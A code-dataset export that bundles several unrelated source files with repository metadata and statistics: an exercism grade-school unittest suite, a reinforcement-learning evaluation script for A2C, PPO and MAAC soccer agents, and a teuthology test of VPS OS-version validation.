2017-06-18T20:06:10.000Z
|
2022-03-31T18:35:51.000Z
|
exercises/practice/grade-school/grade_school_test.py
|
stigjb-forks/exercism-python
|
cfb620d1603eb9b08511f96f00f872c67cac0d05
|
[
"MIT"
] | 1,095
|
2017-06-26T23:06:19.000Z
|
2022-03-29T03:25:38.000Z
|
import unittest
from grade_school import (
School,
)
# Tests adapted from `problem-specifications//canonical-data.json`
class GradeSchoolTest(unittest.TestCase):
def test_roster_is_empty_when_no_student_is_added(self):
school = School()
expected = []
self.assertEqual(school.roster(), expected)
def test_add_a_student(self):
school = School()
school.add_student(name="Aimee", grade=2)
expected = [True]
self.assertEqual(school.added(), expected)
def test_student_is_added_to_the_roster(self):
school = School()
school.add_student(name="Aimee", grade=2)
expected = ["Aimee"]
self.assertEqual(school.roster(), expected)
def test_adding_multiple_students_in_the_same_grade_in_the_roster(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="Paul", grade=2)
expected = [True, True, True]
self.assertEqual(school.added(), expected)
def test_multiple_students_in_the_same_grade_are_added_to_the_roster(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="Paul", grade=2)
expected = ["Blair", "James", "Paul"]
self.assertEqual(school.roster(), expected)
def test_cannot_add_student_to_same_grade_in_the_roster_more_than_once(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="Paul", grade=2)
expected = [True, True, False, True]
self.assertEqual(school.added(), expected)
def test_student_not_added_to_same_grade_in_the_roster_more_than_once(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="Paul", grade=2)
expected = ["Blair", "James", "Paul"]
self.assertEqual(school.roster(), expected)
def test_adding_students_in_multiple_grades(self):
school = School()
school.add_student(name="Chelsea", grade=3)
school.add_student(name="Logan", grade=7)
expected = [True, True]
self.assertEqual(school.added(), expected)
def test_students_in_multiple_grades_are_added_to_the_roster(self):
school = School()
school.add_student(name="Chelsea", grade=3)
school.add_student(name="Logan", grade=7)
expected = ["Chelsea", "Logan"]
self.assertEqual(school.roster(), expected)
def test_cannot_add_same_student_to_multiple_grades_in_the_roster(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=3)
school.add_student(name="Paul", grade=3)
expected = [True, True, False, True]
self.assertEqual(school.added(), expected)
def test_student_not_added_to_multiple_grades_in_the_roster(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=3)
school.add_student(name="Paul", grade=3)
expected = ["Blair", "James", "Paul"]
self.assertEqual(school.roster(), expected)
def test_students_are_sorted_by_grades_in_the_roster(self):
school = School()
school.add_student(name="Jim", grade=3)
school.add_student(name="Peter", grade=2)
school.add_student(name="Anna", grade=1)
expected = ["Anna", "Peter", "Jim"]
self.assertEqual(school.roster(), expected)
def test_students_are_sorted_by_name_in_the_roster(self):
school = School()
school.add_student(name="Peter", grade=2)
school.add_student(name="Zoe", grade=2)
school.add_student(name="Alex", grade=2)
expected = ["Alex", "Peter", "Zoe"]
self.assertEqual(school.roster(), expected)
def test_students_are_sorted_by_grades_and_then_by_name_in_the_roster(self):
school = School()
school.add_student(name="Peter", grade=2)
school.add_student(name="Anna", grade=1)
school.add_student(name="Barb", grade=1)
school.add_student(name="Zoe", grade=2)
school.add_student(name="Alex", grade=2)
school.add_student(name="Jim", grade=3)
school.add_student(name="Charlie", grade=1)
expected = ["Anna", "Barb", "Charlie", "Alex", "Peter", "Zoe", "Jim"]
self.assertEqual(school.roster(), expected)
def test_grade_is_empty_if_no_students_in_the_roster(self):
school = School()
expected = []
self.assertEqual(school.grade(1), expected)
def test_grade_is_empty_if_no_students_in_that_grade(self):
school = School()
school.add_student(name="Peter", grade=2)
school.add_student(name="Zoe", grade=2)
school.add_student(name="Alex", grade=2)
school.add_student(name="Jim", grade=3)
expected = []
self.assertEqual(school.grade(1), expected)
def test_student_not_added_to_same_grade_more_than_once(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="Paul", grade=2)
expected = ["Blair", "James", "Paul"]
self.assertEqual(school.grade(2), expected)
def test_student_not_added_to_multiple_grades(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=3)
school.add_student(name="Paul", grade=3)
expected = ["Blair", "James"]
self.assertEqual(school.grade(2), expected)
def test_student_not_added_to_other_grade_for_multiple_grades(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=3)
school.add_student(name="Paul", grade=3)
expected = ["Paul"]
self.assertEqual(school.grade(3), expected)
def test_students_are_sorted_by_name_in_a_grade(self):
school = School()
school.add_student(name="Franklin", grade=5)
school.add_student(name="Bradley", grade=5)
school.add_student(name="Jeff", grade=1)
expected = ["Bradley", "Franklin"]
self.assertEqual(school.grade(5), expected)
| 38.256983
| 81
| 0.656542
| 885
| 6,848
| 4.815819
| 0.084746
| 0.143125
| 0.225246
| 0.281558
| 0.894181
| 0.887142
| 0.852651
| 0.833412
| 0.802206
| 0.715157
| 0
| 0.012206
| 0.210426
| 6,848
| 178
| 82
| 38.47191
| 0.776031
| 0.009346
| 0
| 0.703448
| 0
| 0
| 0.06473
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 1
| 0.137931
| false
| 0
| 0.013793
| 0
| 0.158621
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d3b48b8fc813c976f77459ecd451ddba7b5ad966
| 25,501
|
py
|
Python
|
eval.py
|
WeiChengTseng/DL_final_project
|
bbe61592a3d85c00731e254edcd1108075c49b6f
|
[
"Apache-2.0"
] | 7
|
2019-05-09T13:43:19.000Z
|
2022-01-11T06:00:05.000Z
|
eval.py
|
WeiChengTseng/DL_final_project
|
bbe61592a3d85c00731e254edcd1108075c49b6f
|
[
"Apache-2.0"
] | null | null | null |
eval.py
|
WeiChengTseng/DL_final_project
|
bbe61592a3d85c00731e254edcd1108075c49b6f
|
[
"Apache-2.0"
] | 4
|
2019-05-10T16:57:37.000Z
|
2019-06-05T14:43:27.000Z
|
import time
import matplotlib
import time
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from tensorboardX import SummaryWriter
from a2c.models import AtariCNN, A2C, A2CLarge
from a2c.envs import make_env, RenderSubprocVecEnv
from a2c.train_multi import train
from ppo.PPO import PPO
from maac.attention_sac import AttentionSAC
from maac_double.attention_sac import AttentionSACDouble
from env_exp import SocTwoEnv
def parse_double(obs):
parsed_obs = [None] * 4
parsed_obs[0] = obs[0][:8]
parsed_obs[2] = obs[0][8:]
parsed_obs[1] = obs[1][:8]
parsed_obs[3] = obs[1][8:]
return np.array(parsed_obs)
def eval_with_random_agent(net_striker,
net_goalie,
env,
device,
eval_epsoid=40):
obs_striker, obs_goalie = env.reset('team')
# time.sleep(5)
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
policies_striker, values_striker = net_striker(obs_striker)
policies_goalie, values_goalie = net_goalie(obs_goalie)
probs_striker = F.softmax(policies_striker, dim=-1)
probs_goalie = F.softmax(policies_goalie, dim=-1)
actions_striker = probs_striker.multinomial(1).data
actions_goalie = probs_goalie.multinomial(1).data
actions_striker = torch.cat([
torch.LongTensor(np.random.randint(0, 7, (8, 1))),
actions_striker[8:],
],
dim=0)
actions_goalie = torch.cat([
torch.LongTensor(np.random.randint(0, 5, (8, 1))),
actions_goalie[8:],
],
dim=0)
# actions_striker = torch.cat([
# actions_striker[:8],
# torch.LongTensor(np.random.randint(0, 7, (8, 1)))
# ],
# dim=0)
# actions_goalie = torch.cat([
# actions_goalie[:8],
# torch.LongTensor(np.random.randint(0, 5, (8, 1)))
# ],
# dim=0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
'team')
obs_striker, obs_goalie = obs
rewards_striker = torch.from_numpy(
rewards[0]).float().unsqueeze(1).to(device)
rewards_goalie = torch.from_numpy(
rewards[1]).float().unsqueeze(1).to(device)
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
return
def eval_self_complete(net_striker,
net_goalie,
env,
device,
order='team',
eval_epsoid=40):
obs_striker, obs_goalie = env.reset(order)
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
policies_striker, values_striker = net_striker(obs_striker)
policies_goalie, values_goalie = net_goalie(obs_goalie)
probs_striker = F.softmax(policies_striker, dim=-1)
probs_goalie = F.softmax(policies_goalie, dim=-1)
actions_striker = probs_striker.multinomial(1).data
actions_goalie = probs_goalie.multinomial(1).data
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
rewards_striker = torch.from_numpy(
rewards[0]).float().unsqueeze(1).to(device)
rewards_goalie = torch.from_numpy(
rewards[1]).float().unsqueeze(1).to(device)
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
return
def eval_self_striker_goalie(net_striker,
net_goalie,
env,
device,
order='team',
eval_epsoid=40):
obs_striker, obs_goalie = env.reset(order)
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
policies_striker, values_striker = net_striker(obs_striker)
policies_goalie, values_goalie = net_goalie(obs_goalie)
probs_striker = F.softmax(policies_striker, dim=-1)
probs_goalie = F.softmax(policies_goalie, dim=-1)
actions_striker = probs_striker.multinomial(1).data
actions_goalie = probs_goalie.multinomial(1).data
actions_striker = torch.cat([
actions_striker[:8],
torch.LongTensor(np.random.randint(0, 7, (8, 1)))
],
dim=0)
actions_goalie = torch.cat([
torch.LongTensor(np.random.randint(0, 5,
(8, 1))), actions_goalie[8:]
],
dim=0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
rewards_striker = torch.from_numpy(
rewards[0]).float().unsqueeze(1).to(device)
rewards_goalie = torch.from_numpy(
rewards[1]).float().unsqueeze(1).to(device)
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
return
def eval_agents_compete(strikers,
goalies,
env,
device,
order='team',
eval_epsoid=40):
obs_striker, obs_goalie = env.reset(order)
policies_striker = [None, None]
policies_goalie = [None, None]
# time.sleep(5)
records = [0] * 3
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
policies_striker[0], _ = strikers[0](obs_striker[:8])
policies_goalie[0], _ = goalies[0](obs_goalie[:8])
policies_striker[1], _ = strikers[1](obs_striker[8:])
policies_goalie[1], _ = goalies[1](obs_goalie[8:])
policy_strikers = torch.cat(policies_striker, dim=0)
policy_goalies = torch.cat(policies_goalie, dim=0)
probs_striker = F.softmax(policy_strikers, dim=-1)
probs_goalie = F.softmax(policy_goalies, dim=-1)
actions_striker = probs_striker.multinomial(1).data
actions_goalie = probs_goalie.multinomial(1).data
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
rewards_striker = torch.from_numpy(
rewards[0]).float().unsqueeze(1).to(device)
rewards_goalie = torch.from_numpy(
rewards[1]).float().unsqueeze(1).to(device)
for i in np.argwhere(dones[0][:8]).flatten():
epsoid += 1
if rewards[1][i + 8] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
print(records)
return
def eval_compete_acppo(strikers,
goalies,
env,
device,
order='team',
eval_epsoid=40):
# env.train()
obs_striker, obs_goalie = env.reset(order)
policies_striker = [None, None]
policies_goalie = [None, None]
# time.sleep(5)
records = [0] * 3
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
policies_striker[0], _ = strikers[0](obs_striker[:8])
policies_goalie[0], _ = goalies[0](obs_goalie[:8])
# policies_striker[1], _ = strikers[1](obs_striker[8:])
# policies_goalie[1], _ = goalies[1](obs_goalie[8:])
action_ppo_striker = strikers[1].act(obs_striker[8:])
action_ppo_goalie = goalies[1].act(obs_goalie[8:])
policy_strikers = policies_striker[0]
policy_goalies = policies_goalie[0]
probs_striker = F.softmax(policy_strikers, dim=-1)
probs_goalie = F.softmax(policy_goalies, dim=-1)
actions_striker = probs_striker.multinomial(1).data
actions_goalie = probs_goalie.multinomial(1).data
# print(actions_striker)
actions_striker = torch.cat((actions_striker, action_ppo_striker),
dim=0)
actions_goalie = torch.cat((actions_goalie, action_ppo_goalie), dim=0)
# random_act_striker = torch.LongTensor(np.random.randint(7, size=(8,1)))
# random_act_goalie = torch.LongTensor(np.random.randint(5, size=(8,1)))
# actions_striker = torch.cat((random_act_striker, action_ppo_striker), dim=0)
# actions_goalie = torch.cat((random_act_goalie, action_ppo_goalie), dim=0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
rewards_striker = torch.from_numpy(
rewards[0]).float().unsqueeze(1).to(device)
rewards_goalie = torch.from_numpy(
rewards[1]).float().unsqueeze(1).to(device)
for i in np.argwhere(dones[0][:8]).flatten():
epsoid += 1
if rewards[1][i + 8] < 0:
records[0] += 1
elif rewards[1][i] < 0:
records[1] += 1
else:
records[2] += 1
print(records)
return
def eval_agents_compete_(strikers,
goalies,
env,
device,
order='team',
eval_epsoid=40):
obs_striker, obs_goalie = env.reset(order)
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
actions_strikers[0], _ = strikers[0](obs_striker[:8])
actions_goalies[0], _ = goalies[0](obs_goalie[:8])
actions_strikers[1], _ = strikers[1](obs_striker[8:])
actions_goalies[1], _ = goalies[1](obs_goalie[8:])
actions_striker = torch.cat(actions_strikers, 0)
actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
return
def eval_maac_with_random(model_path, env, order='team', eval_epsoid=40):
maac = AttentionSAC.init_from_save(model_path)
obs_striker, obs_goalie = env.reset(order)
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
action_maac = maac.step((obs_striker, obs_goalie), explore=True)
# print(action_maac)
actions_strikers[0] = torch.argmax(action_maac[0][:8], dim=-1)
actions_goalies[0] = torch.argmax(action_maac[1][:8], dim=-1)
# print(actions_strikers[0])
actions_strikers[1] = torch.randint(7, size=(8, ))
actions_goalies[1] = torch.randint(5, size=(8, ))
# print(actions_strikers)
actions_striker = torch.cat(actions_strikers, 0)
actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
return
def eval_maac_self_compete(model_path, env, order='team', eval_epsoid=40):
maac = AttentionSAC.init_from_save(model_path)
obs_striker, obs_goalie = env.reset(order)
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
action_maac = maac.step((obs_striker, obs_goalie), explore=True)
# print(action_maac)
actions_strikers[0] = torch.argmax(action_maac[0], dim=-1)
actions_goalies[0] = torch.argmax(action_maac[1], dim=-1)
# print(actions_strikers[0])
# print(actions_strikers)
# actions_striker = torch.cat(actions_strikers, 0)
# actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_strikers[0],
actions_goalies[0], order)
obs_striker, obs_goalie = obs
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
return
def eval_maacac_compete(model_path,
strikers,
goalies,
env,
order='team',
eval_epsoid=200):
maac = AttentionSAC.init_from_save(model_path)
obs_striker, obs_goalie = env.reset(order)
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
action_maac = maac.step((obs_striker, obs_goalie), explore=True)
# print(action_maac)
actions_strikers[0] = torch.argmax(action_maac[0][:8], dim=-1)
actions_goalies[0] = torch.argmax(action_maac[1][:8], dim=-1)
# print(actions_strikers[0])
policy_strikers, _ = strikers(obs_striker[8:])
policy_goalies, _ = goalies(obs_goalie[8:])
probs_striker = F.softmax(policy_strikers, dim=-1)
probs_goalie = F.softmax(policy_goalies, dim=-1)
actions_strikers[1] = probs_striker.multinomial(1).data.flatten()
actions_goalies[1] = probs_goalie.multinomial(1).data.flatten()
# print(actions_strikers)
actions_striker = torch.cat(actions_strikers, 0)
actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
return
def eval_maacdoubleac_compete(model_path,
strikers,
goalies,
env,
order='team',
eval_epsoid=200):
maac = AttentionSACDouble.init_from_save(model_path)
# obs_striker, obs_goalie = env.reset(order)
obs_striker, obs_goalie, obs_striker2, obs_goalie2 = parse_double(
env.reset(order))
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = (torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = (torch.from_numpy(obs_goalie).float()).to(device)
obs_striker2 = (torch.from_numpy(obs_striker2).float()).to(device)
obs_goalie2 = (torch.from_numpy(obs_goalie2).float()).to(device)
action_maac = maac.step(
(obs_striker, obs_goalie, obs_striker2, obs_goalie2), explore=True)
# print(action_maac)
actions_strikers[0] = torch.argmax(action_maac[0], dim=-1)
actions_goalies[0] = torch.argmax(action_maac[1], dim=-1)
# print(actions_strikers[0])
policy_strikers, _ = strikers(obs_striker2[:])
policy_goalies, _ = goalies(obs_goalie2[:])
probs_striker = F.softmax(policy_strikers, dim=-1)
probs_goalie = F.softmax(policy_goalies, dim=-1)
actions_strikers[1] = probs_striker.multinomial(1).data.flatten()
actions_goalies[1] = probs_goalie.multinomial(1).data.flatten()
# print(actions_strikers)
actions_striker = torch.cat(actions_strikers, 0)
actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie, obs_striker2, obs_goalie2 = parse_double(obs)
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
return
def eval_maacdoubleppo_compete(model_path,
strikers,
goalies,
env,
order='team',
eval_epsoid=200):
maac = AttentionSACDouble.init_from_save(model_path)
# obs_striker, obs_goalie = env.reset(order)
obs_striker, obs_goalie, obs_striker2, obs_goalie2 = parse_double(
env.reset(order))
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = (torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = (torch.from_numpy(obs_goalie).float()).to(device)
obs_striker2 = (torch.from_numpy(obs_striker2).float()).to(device)
obs_goalie2 = (torch.from_numpy(obs_goalie2).float()).to(device)
action_maac = maac.step(
(obs_striker, obs_goalie, obs_striker2, obs_goalie2), explore=True)
# print(action_maac)
actions_strikers[0] = torch.argmax(action_maac[0], dim=-1)
actions_goalies[0] = torch.argmax(action_maac[1], dim=-1)
# print(actions_strikers[0])
# policy_strikers, _ = strikers(obs_striker2[:])
# policy_goalies, _ = goalies(obs_goalie2[:])
# probs_striker = F.softmax(policy_strikers, dim=-1)
# probs_goalie = F.softmax(policy_goalies, dim=-1)
actions_strikers[1] = strikers.act(obs_striker2).flatten()
actions_goalies[1] = goalies.act(obs_goalie2).flatten()
# print(actions_strikers)
actions_striker = torch.cat(actions_strikers, 0)
actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie, obs_striker2, obs_goalie2 = parse_double(obs)
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
return
if __name__ == '__main__':
env_path = './env/macos/SoccerTwosBeta.app'
env = SocTwoEnv(env_path, worker_id=0, train_mode=False, render=True)
# net_path = './a2c/ckpt/a2c_step20320000.pth'
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
net_path = './a2c/ckpt_reward_shaping/a2c_step39960000.pth'
# net_path_large = './a2c/ckpt_rs_large/a2cLarge_step36960000.pth'
# net_path_large = './a2c/ckpt_rs_large/a2cLarge_step36960000.pth'
net_path_large = './a2c/ckpt_wors_2e/a2cLarge_step39960000.pth'
# net_path_large2 = './a2c/ckpt_wors_2e/a2cLarge_step13920000.pth'
net_path_large2 = './a2c/ckpt_rs_large/a2cLarge_step36960000.pth'
ppo_striker = './ppo/ckpt/PPO_strikerSoccerTwos_9920.pth'
ppo_goalie = './ppo/ckpt/PPO_goalieSoccerTwos_9920.pth'
# maac_path = './maac/server/model.pt'
# maac_path = './maac/dup_policy/model.pt'
maacdouble_path = './maac_double/server/model.pt'
maacac_path = './maac_ac/server/model.pt'
# maac_path = './maac/cedl/model.pt'
# maac_path = './maac/cedl_h2/model.pt'
# maac_path = './maac/models/maac/run10/model.pt'
# maac_path = './maac/models/maac/run14/model.pt'
with torch.no_grad():
# policy_striker, policy_goalie = A2C(7).to(device), A2C(5).to(device)
policy_striker_large, policy_goalie_large, = A2CLarge(7).to(
device), A2CLarge(5).to(device)
policy_striker_large2, policy_goalie_large2, = A2CLarge(7).to(
device), A2CLarge(5).to(device)
ckpt_large = torch.load(net_path_large, map_location=device)
policy_striker_large.load_state_dict(ckpt_large['striker_a2c'])
policy_goalie_large.load_state_dict(ckpt_large['goalie_a2c'])
ckpt_large2 = torch.load(net_path_large2, map_location=device)
policy_striker_large2.load_state_dict(ckpt_large2['striker_a2c'])
policy_goalie_large2.load_state_dict(ckpt_large2['goalie_a2c'])
# ckpt = torch.load(net_path, map_location=device)
# policy_striker.load_state_dict(ckpt['striker_a2c'])
# policy_goalie.load_state_dict(ckpt['goalie_a2c'])
ppo_striker = PPO(112, 7, 64, ckpt_path=ppo_striker)
ppo_goalie = PPO(112, 5, 64, ckpt_path=ppo_goalie)
policy_striker_large.eval()
policy_goalie_large.eval()
# policy_striker.eval()
# policy_goalie.eval()
# eval_with_random_agent(policy_striker,
# policy_goalie,
# env,
# device,
# eval_epsoid=100)
# eval_with_random_agent(policy_striker_large,
# policy_goalie_large,
# env,
# device,
# eval_epsoid=100)
# eval_self_striker_goalie(policy_striker_large,
# policy_goalie_large,
# env,
# device,
# eval_epsoid=100)
# eval_self_complete(policy_striker, policy_goalie, env, device, 'team')
# eval_self_complete(policy_striker_large, policy_striker_large, env,
# device, 'team')
eval_self_complete(policy_striker_large2, policy_striker_large2, env,
device, 'team')
# eval_agents_compete([policy_striker_large, policy_striker],
# [policy_goalie_large, policy_goalie],
# env,
# device,
# order='team',
# eval_epsoid=100)
# eval_agents_compete([policy_striker_large, policy_striker_large2],
# [policy_goalie_large, policy_goalie_large2],
# env,
# device,
# order='team',
# eval_epsoid=100)
# eval_compete_acppo([policy_striker_large, ppo_striker],
# [policy_goalie_large, ppo_goalie],
# env,
# device,
# order='team',
# eval_epsoid=100)
# eval_maac_with_random(maac_path, env)
# eval_maac_self_compete(maac_path, env)
# eval_maacac_compete(maac_path, policy_striker_large,policy_goalie_large,env)
# eval_maacdoubleac_compete(maacdouble_path, policy_striker_large,
# policy_goalie_large, env)
# eval_maacdoubleppo_compete(maacdouble_path, ppo_striker,
# ppo_goalie, env)
pass
| 36.223011
| 86
| 0.570135
| 2,931
| 25,501
| 4.691914
| 0.05766
| 0.045084
| 0.036649
| 0.040067
| 0.834497
| 0.802283
| 0.762289
| 0.755308
| 0.73313
| 0.709424
| 0
| 0.032626
| 0.318497
| 25,501
| 704
| 87
| 36.223011
| 0.758674
| 0.159955
| 0
| 0.787611
| 0
| 0
| 0.019419
| 0.014072
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026549
| false
| 0.002212
| 0.037611
| 0
| 0.090708
| 0.004425
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3b5fe9cbe26215c06afe171fa32acab4a36471b
| 2,325
|
py
|
Python
|
teuthology/test/test_vps_os_vers_parameter_checking.py
|
tchaikov/teuthology
|
bda9cb993f372116c804ea49daefda6b816650d5
|
[
"MIT"
] | 1
|
2018-05-17T13:02:42.000Z
|
2018-05-17T13:02:42.000Z
|
teuthology/test/test_vps_os_vers_parameter_checking.py
|
tchaikov/teuthology
|
bda9cb993f372116c804ea49daefda6b816650d5
|
[
"MIT"
] | null | null | null |
teuthology/test/test_vps_os_vers_parameter_checking.py
|
tchaikov/teuthology
|
bda9cb993f372116c804ea49daefda6b816650d5
|
[
"MIT"
] | 2
|
2017-12-21T08:05:49.000Z
|
2021-04-06T09:23:06.000Z
|
from .. import lock
class Mock: pass
class TestVpsOsVersionParamCheck(object):
def setup(self):
self.fake_ctx = Mock()
self.fake_ctx.machine_type = 'vps'
self.fake_ctx.num_to_lock = 1
self.fake_ctx.lock = False
def test_ubuntu_precise(self):
self.fake_ctx.os_type = 'ubuntu'
self.fake_ctx.os_version = 'precise'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert check_value
def test_ubuntu_number(self):
self.fake_ctx.os_type = 'ubuntu'
self.fake_ctx.os_version = '12.04'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert check_value
def test_rhel(self):
self.fake_ctx.os_type = 'rhel'
self.fake_ctx.os_version = '6.5'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert check_value
def test_mixup(self):
self.fake_ctx.os_type = '6.5'
self.fake_ctx.os_version = 'rhel'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert not check_value
def test_bad_type(self):
self.fake_ctx.os_type = 'aardvark'
self.fake_ctx.os_version = '6.5'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert not check_value
def test_bad_version(self):
self.fake_ctx.os_type = 'rhel'
self.fake_ctx.os_version = 'vampire_bat'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert not check_value
| 34.191176
| 53
| 0.575484
| 298
| 2,325
| 4.107383
| 0.14094
| 0.222222
| 0.305556
| 0.254902
| 0.818627
| 0.784314
| 0.75
| 0.75
| 0.75
| 0.75
| 0
| 0.007256
| 0.347957
| 2,325
| 67
| 54
| 34.701493
| 0.800132
| 0
| 0
| 0.642857
| 0
| 0
| 0.02883
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 1
| 0.125
| false
| 0.017857
| 0.017857
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d3b9f871778afa863b086bd919e3e7feaf470222
| 215
|
py
|
Python
|
realtime_api/game/__init__.py
|
mmartin/ogs_api
|
